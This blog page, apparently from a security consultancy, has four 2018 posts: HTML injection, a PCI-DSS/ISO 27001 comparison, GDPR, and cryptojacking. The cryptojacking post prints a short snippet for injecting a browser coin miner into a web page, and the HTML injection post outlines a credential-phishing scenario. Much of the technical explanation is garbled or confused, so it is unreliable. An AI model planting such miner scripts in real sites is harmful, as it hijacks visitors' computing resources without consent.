Monday 23 April 2018

HTML INJECTION ATTACK

HTML INJECTION ATTACK


INTRODUCTION:

HTML injection is an attack which occurs in web applications that allows users to insert an HTML tag attributes via using any specific parameters like,  <h>, </h1>, <td>, <tr>, <a href> tags are used as one of the sources to perform this HTML based injection attack.
These strategies provided with untrusted input, at that point there is a high risk of XSS, specifically an HTML injection one. If strings not sanitised efficiently, the issue could prompt XSS based HTML injection. This HTML injection could lead the attacker to modify the web content easily.

POSSIBLE ATTACK SCENARIO:

In this way, how we can perform an HTML injection attack using the following steps,
  •  In this beginning process, an attacker can find the injection flaw and try to make an HTML injection attack.
  • Attacker crafts the malicious links, including his infected HTML injection code and sends it to a client through an email
  • When the client visits the web page because of the page located within a trusted domain
  • The attacker can inject an HTML code is rendered and presented to the client requesting valid credentials like username and password
  • The client enters a username and password, which are both sent to the attacker server.
HTML injection attack also have two different types, there are
  • stored HTML injection attack
  • Reflected HTML injection attack

STORED HTML INJECTION ATTACK

In this stored HTML is also known as persistence (always stored in the backend database), the attacker can give the credentials inserting in the web server it can be stored in permanently, and the application server gives out it to the user when the user visits the targeted website. Here I have to give a sample HTML code for the stored HTML injection.
When the client clicks the payload, it gets redirected to the official part of the website; the injected HTML code will get executed by the browser.

REFLECTED HTML INJECTION

The reflected HTML is known as Non-persistence (It does not store in the backend database, it will get immediately indicated). Whenever the backend server processes any HTML input without proper sanitisation and validation of the given HTML input,  it will lead to HTML injection in the web application.

Here I have to give the input like <h>you are hacked</h>, and it will reflect as ‘you are hacked “ class=” colourbox” title=” help me with page”>

MITIGATION FOR HTML INJECTION:

Here we used parameterised queries to block unwanted scripts for the HTML injection using special characters like <, >, “, ‘, %, &, / to appropriately sanitised in the given input fields. The favoured choice is to utilise a protected API which stays away from the utilisation of the translator entirely or provides a parameterised interface. Be careful of APIs, for example, put away methods, are parameterised.
If a parameterised API isn’t accessible, you should carefully escape unique characters utilising the appropriate escape grammar for that translator.

CONCLUSION:

HTML injection is similar to cross-site scripting vulnerability (XSS), which affects the client side. So, HTML injection can exploit in the same way as that of cross-site scripting which includes adding HTML data to the web application, temporary defacement of website etc… hence it is necessary to prevent web applications from HTML injection.

AUTHOR

Aravindan S
Security Engineer
BriskinfoSec Technology and Consulting  Pvt Ltd.,
https://www.linkedin.com/in/aravindhan-s-90b98787/
Posted by at No comments:
Labels: , , , ,

Thursday 19 April 2018

PCI-DSS VS ISO 27001 STANDARDS



PCI-DSS VS ISO 27001 STANDARDS


INTRODUCTION:

PCI-DSS and ISO 27001 are organized in sets of requirements for the cardholder data process. PCI-DSS has 12 sets of elements; there are about 250 controls based on securing credit card information. In ISO 27001, there are 11 sets of elements with 114 controls based on improving an ISMS, planning, running, implementing, monitoring. In this article, I’m going to discuss and examines the interoperability of PCI-DSS and ISO/IEC 27001 and also some of the pros and cons of the PCI-DSS and ISO/IEC 27001 standards.

PCI-DSS STANDARD:

PCI-DSS is a standard of data security for the credit card organizations, and it also applies only to companies that have the process, store, or transmit credit card data. Compliances with the standard are mandatory, though depending on the full range of cards processed. PCI-DSS is a card data security standard developed by a council consisting of Visa, MasterCard, American Express, Discover and JCB to protect the payment card and cardholder’s sensitive information processed by organizations.

ISO 27001 STANDARD:

ISO 27001 is a standard that includes seven main titles within the scope, such as organization, leadership, planning, support, operation, performance evaluation and improvement. It’s a worldwide recognition, which lays down the requirements for the establishment of an ISMS. It applies to any organization.

HIGH-LEVEL MAPPING OF PCI AND ISO27001
PCI-DSS REQUIREMENTS
ISO27001 CLAUSE
1. Install and maintain a firewall configuration to protect cardholder data.A-12: Operations Security
A-13: Communications Security
2. Do not use vendor-supplied defaults for system passwords and other security parameters.A-12: Operations Security
A-13: Communications Security
3. Protect stored cardholder data.A-12: Operations Security
A-13: Communications Security
4. Encrypt transmission of cardholder data across open, public networks.A-14: System acquisition, development and maintenance.
5. Protect all systems against malware and regularly update antivirus software or programs.A-14: System acquisition, development and maintenance.
6. Develop and maintain secure systems and applications.A-14: System acquisition, development and maintenance.
7. Restrict access to cardholder data by business need to knowA-12: Operations Security
A-13: Communications Security
8. Identify and authenticate access to system components.A-12: Operations Security
A-13: Communications Security
9. Restrict physical access to cardholder data.A-11: Physical and environmental security
10. Track and monitor all access to network resources and cardholder data.A-12: Operations Security
A-13: Communications Security
11. Regularly test security systems and process.A-14: System acquisition, development and maintenance
A-6: Organization of Information security
A-18: Compliance
12. Maintain a policy that addresses information security for all personnel.A-5: Information security policies

COMPARISON OF PCI-DSS AND ISO 27001

It is recommended and required that both PCI-DSS and ISO27001 provides better solutions for risk management to Card data Industry and other organizations. The ISO 27001 is better than that of PCI-DSS standards as all the controls have been written at a high level. There are compliance levels in PCI-DSS to measure the maturity level of the company, but no compliance levels exist in ISO 27001. “The organizations have to determine the boundaries and applicability of the information security management system to establish its scope.” When comparing the scope of the two standards, scope selection in ISO/IEC 27001 depends on the company; however, the scope is exactly the credit cardholder information in PCI-DSS.
The controls in ISO 27001 are a suggestion to all the organizations, and also it is important to note that the controls in PCI-DSS standards are mandatory to payment and Cardholder data organizations.
Were the ISO 27001 contains more requirements than PCI-DSS, it is easier to comply with the ISO 27001 standard to the organizations.
According to the costs, establishing a partial (ISMS) audit and PDCA cycle which cost more to the organization as it a mandatory.
In an organization, the re certification auditing of ISO 27001 is performed in every three-year cycles, and internal scope auditing is conducted. There are also surveillance audits that are done at least once. In every PCI-DSS auditing, there are four network scanning audits and a Level 1 onsite audit.
MAPPING OF PCI-DSS AND ISO 27001
PARAMETER
ISO27001
PCI-DSS
CreatorISOPCI Council
FlexibilityHighLow
ScopeDepends on the companyCredit cardholders information
Controls appliedFlexibleTight
ControlsHigh-LevelLow-Level
ComplianceEasyHard
Number of Controls114224
AuditingThree-year cycles and a small-scope audit performed every yearFour network scanning audits and an onsite audit for level 1
CertificationMaybe given to all companiesAny companies that provide information security for critical paying processes
Compliance levelDoes not existExists

CONCLUSION:

PCI-DSS is a standard which handles Security for Cardholder data, whereas ISO 27001 is a specified to the Information Security and Management of the Organization. Mapping of PCI-DSS and ISO/IEC 27001 standards is optional information for managers who are assigned with ensuring to either standard in their organizations. It is recommended that PCI-DSS and ISO/IEC 27001 must be combined to give a better solution to risk mitigation and secure the organization of Cardholder data.

REFERENCE:

AUTHOR

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.,
https://www.linkedin.com/in/dharmeshbaskaran/
Posted by at No comments:
Labels: , ,

Thursday 12 April 2018

GDPR (GENERAL DATA PROTECTION REGULATION)


GDPR (GENERAL DATA PROTECTION REGULATION)



GDPR is the General Data Protection Regulation, adopted on April 27, 2016, and it will be valid from May 25, 2018. The GDPR replaces the EU’s Data Protection Directive, and this method is mainly used by European Union member’s to protect their Data.GDPR is primarily used to control the Data Breach, Data portability on EU member’s and followed by this other countries are started to develop GDPR for their Data Protection but this method can also be used to store the personal data, or other data’s comes under the national security organisations.

DATA’S PROTECT UNDER GDPR:

  • Necessary Identity information such as name, address and ID numbers
  • Web Data such as location. IP address and cookie data
  • Health and generic Data
  • Biometric Data
  • Political Opinion etc.

GDPR OVERALL ARCHITECTURE:

Here the overall architecture diagram of the GDPR is described, and it starts from the significant executive team followed by legal advisories (adopted by a required organisation to cross-check the process) and to the IT and software development of mainly follows. GDPR under CIA triad is called Confidentiality, Integrity and Availability to protect their required data.The outcome of the products is checked by the Product Development Team.Finally, CISO and information security follows data privacy method to process the data in a secured manner and later it gets process by the data analyst and reaches the market that’s the overall process of the GDPR takes place and  refer the below link  to follow the GDPR checklist for better data protection

GDPR IN CYBERSECURITY:

Most of the Cybersecurity Organization’s falls under the network, endpoint protections and they also prevent us from the unauthorised access, threat management, and Vulnerability assessment etc. and cybersecurity in GDPR takes place by its method called data encryption, and data pseudonymization. Data encryption is the process that collects the whole data and changes it to the code and stores it in an encrypted way. unless you entered the critical value, you could not access the data and data pseudonymization is the method to add additional data subject to your old data ’s, data masking for better security or hashing can be done here to protect your data’s
Data breaches in cybersecurity organisations can be controlled by GDPR and So, consider investing in Cyber Essentials, a certification scheme backed by the British government to help organisations to prevent online attacks and hacking. This will assist with compliance with the GDPR, as well as improving the security of your company, customers and partners.
Sans generates a compliance report for GDPR which has to be followed by every organisation to secure your data, and by this, you can also trap the path of where mainly data breaches take place

DETECT AND BLOCK THREATS IN ATTACK CYCLE:

Security tools used in the cybersecurity organisation is used to test your existing vulnerability and risks, and here by using GDPR you can set some conditions to protect your data, and they are by the below techniques as follows.

FIRST LOOK AT EXPOSED PRIVILEGED ACCOUNTS:

When unconstrained delegation has been enabled it leads an attacker to connect to your machine and by this ticket granting ticket will be stored and it leads to compromise and control a domain controller

IDENTIFY CONTROLS THAT CAN BYPASS PRIVILEGED ACCOUNT SECURITY:

How many of you know that all your privileged accounts are safe? First, you have to check for every privileged account and secure the required account with some password or with some encryption methods, and by then it will be difficult for an attacker to bypass your account.

IDENTIFY AUTHENTICATION FIELDS TO YOUR ACCOUNT:

Check for the authentication field in your account that can be easily bypassed, e.g. Kerberos authentication or another authentication process. These flaws attacker can easily access your account and can gather any information’s and also set encryption for your account to protect your data, and by this, it can also secure you from unauthorised access.

GDPR IN PENETRATION TESTING:

The Overall Cybersecurity breach of 2017 was about 61% holds personal data on their customers electronically, and about 46% of all UK business identified at least one cybersecurity breach or attack in the past 12 months. GDPR in CREST certificate launched for network infrastructure, and here by this, an attack can process the cardholder environment.
Refer the above link to process GDPR toolkit guides to follow for every organisation to prepare GDPR data protection

OVERALL STATISTICS OF GDPR:

C GDPR is the official course offered by the IT governance and want to get certified in GDPR refer the link as follows.

CONCLUSION:

I’m Sure that we have discussed something about GDPR data protection and also about its significant role in cybersecurity and follow the GDPR checklist to secure data protection for your organisation “are you waiting for the better data protection and we are also waiting for it.”
Reference Links:

AUTHOR

RamKumar
Security Engineer
BriskInfosec Technolagy And consulting PVT LTD
follow me @https://www.linkedin.com/in/ram-kumar-3439b511a/
Posted by at No comments:
Labels: , , , ,

Monday 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


Cryptocurrency mining is a kind of digital currency which transfer across the internet, By using cryptocurrency mining people started to earn money in online
In recent days many people began to make money by this process, where it calculates the hash rate for every payment for (e.g.) if you are transferring money through online the interest rate of the required transaction is shared to the bank by which he moved capital
Here Cryptocurrency mining started to capture the hash rate for each payment, and some required share get passed to the person who mines it and by each transaction, it generated a blockchain and based on its other new bitcoins gets created

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF-MILLION PCS USING NSA EXPLOIT

Several Cybersecurity firms are reporting on new cryptocurrency mining viruses that are being spread using Eternal Blue NSA exploit the hacking group Shadow Brokers leaked that
Researchers from Proof point discovered a massive global botnet dubbed “Smominru” that is using Eternal Blue SMB exploit (CVE-2017-0144) is the primary function is used to infect Windows computer to secretly mine Monero cryptocurrency, worth about millions of dollars, for its master
In 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows. According to researchers and based on the hash power obtained by Monero Payment address the control of the botnet get raised twice than the regular botnets
This botnet has already mined over 8,900 Monero, valued about a range of $3.6 million, at the rate of roughly 24 Monero per day and by using it they started to steal millions of computers, and it mainly affects over Russia, India and Taiwan
A proof point of researchers says that cybercriminals are using at least 25 machines to scan the internet to find vulnerable Windows computer and also using leaked NSA’s RDP protocol exploit of Esteem Audit (CVE-2017-0176) for infection.
Want amine is one of the recent Eternal Blue exploit to infect computers to mine Monero cryptocurrency, and it’s was harder to detect by any antivirus, and it affects many companies for nearly about weeks or over months
Attackers started to use Crypto jacking, used as a browser-based JavaScript code, and cryptocurrency miners utilise this method for  website visitors CPUs power to mine cryptocurrencies for monetisation

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is a part of mining process that performed through your browser, and it’s one of the oldest methods launched in 2011, and it works on based on some scripts and it different from file-based cryptocurrency which involves downloading and executing a detectable files
Bitcoin plus is one of the methods to mine your browser. we can generate a JavaScript code, and once we inject the JavaScript code on the web page when a visitor gets signup to the page automatically the page gets mined, and browser-based mining takes place, and the mined Javascript code for your reference
Example Script:
  1. < Script src = https: //testphp.vulnweb.com/lib/testphp.min.js></script>
  2. < Script > Var miner = newcognitive.User(‘ < site - key > ’, ‘john - days’);
  3. Start(); < /Script>
Once the required codes get executed on your website your browser gets started to mine, and it also increases the load of your CPU session, and by this method, the end user can be easily get profited

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Apart from ransomware the cryptocurrency mining malware place a vital role in our daily life and this mining is mainly used to mine your website
Most attackers use Pirate bay to look over the CPU process usage, we can also use it to detect the CPU usage of your system, and we can check out if any unknown website or mining website are running over, by the way
By the way, we can detect many mined sites, or we also have several browsers add-on to identify the mined websites, and they are as follows.
  • Use No Coin Extension
  • Use Minor Block Chrome Extension
  • Block coin mining domains in hosts file
  • Use no scripts in Firefox

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be done using ransomware techniques, and here a new ransomware miner called the Trojan-Ransom.Win32.Linkup a new kind of ransomware it does not encrypt your files it just creates a mining robot on your system
Link-up ransomware creates a fake websites get created on your system and by this site if a person uses it redirect your site to some other site and by this through the add on’s on fake site credits some share amount to the miner
By this ransom it ask you to download some malware files, and once you installed it automatically download some bitcoin mining software
When  the  victim clicks the required software it gets processed and it makes your CPU or system runs faster and consumes higher energy
It further leads to increase your electric bill rate higher, based on the electric energy consumed  the crypto miners get some shares6
Linkup ransomware is also a different type of other malware like crypto locker, and it was also ransomware which hits  a virus on US police department and asked to pay $800 bitcoins, and the virus is removed once the demanded amount paid to render it more concerning than linkup

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency Mining malware attacks are started to affect mobile devices by passing mined code on android apps, and it’s been affecting most of the android users who download some legitimate-looking apps that are packed with some codes that “mines” for hackers without the user’s knowledge
These attacks are already happening in North America and Russia, and half of the cryptocurrency mining malware attacks are in Russia, and 20 percent are in the US, and a recent spate of attackers started to send some fake message of phishing attacks in Australia, and it tries to convince the victim to download some mining malware to their phones
One example of mobile cryptocurrency mining malware that Symantec sends a Motherboard appeared to be a fully-functioning crossword puzzle game, app but in the background, it was fetching some mining cryptocurrencies and by running the mined apps may drain your battery and make your Phone less responsive be aware before you started to use an unknown apps

OVERALL CRYPTOCURRENCY MINING USED BY THE ATTACKERS:

CONCLUSION:

Cryptocurrency mining attacks can spread using various phases like botnets, browser-based using JavaScript mined codes, and it also affects mobile phone through some malicious apps and by using this cryptocurrency mining many attackers started to earn money, and you can check it through some bitcoin apps that are available on the internet
Reference Links:

AUTHOR

RamKumar G
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/
Posted by at No comments:
Labels: , , , , ,
Subscribe to: Posts (Atom)